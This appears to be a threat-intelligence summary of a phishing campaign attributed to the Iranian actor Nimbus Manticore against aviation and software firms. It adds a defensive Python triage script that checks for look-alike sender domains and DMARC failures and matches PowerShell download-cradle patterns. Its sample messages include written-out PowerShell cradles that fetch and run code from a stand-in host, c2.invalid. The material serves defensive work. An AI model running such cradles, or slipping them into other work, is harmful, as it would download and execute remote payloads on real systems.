Iranian Threat Actor Nimbus Manticore Launches Phishing Campaign Targeting Aviation and Software Sectors
Stay alert for phishing emails that impersonate aviation and software companies: verify sender domains before opening attachments, detonate suspicious attachments in a sandbox, and train staff on phishing indicators.
Summary
The Iranian state‑sponsored threat actor known as Nimbus Manticore, also tracked as Screening Serpens and UNC1549, has been linked to a new campaign that uses lures impersonating organizations in the aviation and software sectors. The campaign has spread across the United States, Europe, and the Middle East, following the joint U.S.–Israeli military operation against Iran in late February 2026. The attackers crafted spear‑phishing emails that appear to come from legitimate aviation companies and software vendors and entice recipients to open malicious attachments or follow compromised links. The lures rely on industry‑specific terminology and branding so that they read as routine business mail to both filters and recipients. The actor registers custom domains that mimic real company domains and embeds the malicious payload in PDF or Office documents. It also sends some of the phishing messages from compromised email accounts; mail from a genuine account passes the usual sender‑authentication checks and is therefore more likely to be opened. Researchers have identified the payload as a backdoor that gives the operators remote access to the victim’s system. The activity shows the actor’s continued focus on high‑profile sectors and its ability to align operations with geopolitical events.
Nimbus Manticore’s phishing emails use subject lines that reference flight schedules, maintenance updates, or software release notes, so they look like routine correspondence to industry professionals. The malicious attachments carry a PowerShell script that downloads an executable from a command‑and‑control (C2) server. The actor also harvests credentials by redirecting users to a fake login page that captures usernames and passwords. The campaign’s geographic scope includes the U.S., Germany, France, and Israel, indicating a coordinated effort across multiple regions. The researchers recommend verifying the sender’s domain, inspecting attachments in a sandbox, and enforcing multi‑factor authentication on critical accounts. Note that MFA based on codes the user types can be captured by the same kind of fake login page; phishing‑resistant methods such as FIDO2 security keys do not share that weakness.
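As an added example (not code from the original report or from the researchers it cites), the following Python script applies the recommended checks to constructed sample messages: it flags sender domains that imitate a short allowlist of hypothetical partner domains (homoglyph swaps, typosquats, the partner name buried in a longer domain, or the partner brand only in the display name), notes when mail claiming a trusted domain fails DMARC, and scans attachment text for the PowerShell download‑cradle strings the report describes. The domain names, header values, pattern list and c2.invalid URLs are all constructed for the example.

```python
import re
from email.utils import parseaddr

# Constructed allowlist of partner domains (hypothetical names; substitute your own).
TRUSTED_DOMAINS = {"example-aero.com", "example-software.com"}

# Digits commonly substituted for look-alike letters in typosquatted domains.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})

# Strings that commonly appear in PowerShell download cradles (illustrative, not exhaustive).
CRADLE_PATTERNS = {
    "web-request": r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b",
    "webclient-download": r"\.Download(File|String|Data)\(",
    "bits-transfer": r"Start-BitsTransfer",
    "encoded-command": r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    "invoke-expression": r"\bIEX\b|Invoke-Expression",
    "hidden-window": r"-w(indowstyle)?\s+hidden",
}


def normalize(domain: str) -> str:
    """Collapse homoglyph tricks so examp1e-aero.com compares equal to example-aero.com."""
    return domain.lower().translate(HOMOGLYPHS).replace("rn", "m").replace("vv", "w")


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch short typosquats such as example-aero.co."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_sender(from_header: str):
    """Return (kind, domain) where kind is 'trusted', 'lookalike' or 'unknown'."""
    display, addr = parseaddr(from_header)
    domain = addr.rpartition("@")[2].lower()
    display_key = re.sub(r"[^a-z0-9]", "", display.lower())
    if not domain:
        return "unknown", domain
    if domain in TRUSTED_DOMAINS:
        return "trusted", domain
    for trusted in TRUSTED_DOMAINS:
        if domain.endswith("." + trusted):            # genuine subdomain of a partner
            return "trusted", domain
        brand = re.sub(r"[^a-z0-9]", "", trusted.split(".")[0])
        if (normalize(domain) == normalize(trusted)   # homoglyph swap
                or levenshtein(domain, trusted) <= 2  # one- or two-character typosquat
                or trusted in domain                  # example-aero.com.evil.invalid
                or brand in display_key):             # partner brand in display name only
            return "lookalike", domain
    return "unknown", domain


def find_download_cradle(text: str) -> list:
    """Names of cradle patterns present in attachment text (macro, script, or decoded content)."""
    return sorted(name for name, pat in CRADLE_PATTERNS.items()
                  if re.search(pat, text, re.IGNORECASE))


def triage(msg: dict) -> dict:
    """Combine the sender-domain check, the DMARC result and the attachment scan into a verdict."""
    reasons = []
    kind, domain = classify_sender(msg["from"])
    dmarc_pass = "dmarc=pass" in msg.get("authentication_results", "").lower()
    if kind == "lookalike":
        reasons.append(f"sender domain {domain} imitates a trusted partner")
    elif kind == "trusted" and not dmarc_pass:
        reasons.append(f"{domain} is trusted but DMARC did not pass (likely spoofed)")
    hits = find_download_cradle(msg.get("attachment_text", ""))
    if hits:
        reasons.append("attachment contains a PowerShell download cradle: " + ", ".join(hits))
    verdict = "block" if hits or kind == "lookalike" else ("review" if reasons else "allow")
    return {"verdict": verdict, "sender": kind, "reasons": reasons}


# Constructed sample messages; the URLs use the reserved .invalid TLD and are not real IOCs.
SAMPLE_MESSAGES = [
    {   # typosquatted partner domain plus a download cradle in the attachment
        "from": "Flight Ops <ops@examp1e-aero.com>",
        "authentication_results": "mx.example.net; dmarc=pass header.from=examp1e-aero.com",
        "attachment_text": '''powershell -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://c2.invalid/update.exe','update.exe')"''',
    },
    {   # genuine but compromised partner account: DMARC passes, only the attachment scan fires
        "from": "Maintenance Updates <maintenance@example-software.com>",
        "authentication_results": "mx.example.net; dmarc=pass header.from=example-software.com",
        "attachment_text": "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/stage2.ps1')",
    },
    {   # spoofed partner domain: DMARC fails, nothing attached
        "from": "Notices <notices@example-aero.com>",
        "authentication_results": "mx.example.net; dmarc=fail header.from=example-aero.com",
        "attachment_text": "",
    },
    {   # unrelated sender with a benign attachment
        "from": "newsletter@vendor-news.invalid",
        "authentication_results": "mx.example.net; dmarc=pass header.from=vendor-news.invalid",
        "attachment_text": "Release notes for version 4.2: bug fixes and performance improvements.",
    },
]


def run_samples() -> list:
    """Verdict for each constructed sample, in order."""
    return [triage(m)["verdict"] for m in SAMPLE_MESSAGES]


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        result = triage(msg)
        print(msg["from"], "->", result["verdict"], "|", "; ".join(result["reasons"]) or "no findings")
```

The second sample is the case to note: mail sent from a genuinely compromised partner account passes DMARC, so sender verification alone clears it and only the attachment scan catches the cradle. Real cradles are frequently obfuscated, so string matching on attachment content is a first‑pass filter ahead of sandbox detonation, not a substitute for it.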
Key changes
- Nimbus Manticore (Screening Serpens, UNC1549) launched a phishing campaign targeting aviation and software sectors.
- The campaign spread across the U.S., Europe, and the Middle East after the U.S.–Israeli operation in late February 2026.
- Spear‑phishing emails mimic legitimate aviation companies and software vendors, using custom look‑alike domains and industry terminology.
- Malicious attachments contain a PowerShell script that downloads a remote executable from a C2 server.
- The threat actor also uses fake login pages to harvest credentials.
- Researchers identified a backdoor that provides remote access to victim systems.
- The campaign demonstrates the actor’s focus on high‑profile sectors and geopolitical timing.
- Recommended mitigations: verify sender domains, sandbox attachments, and enforce multi‑factor authentication on critical accounts.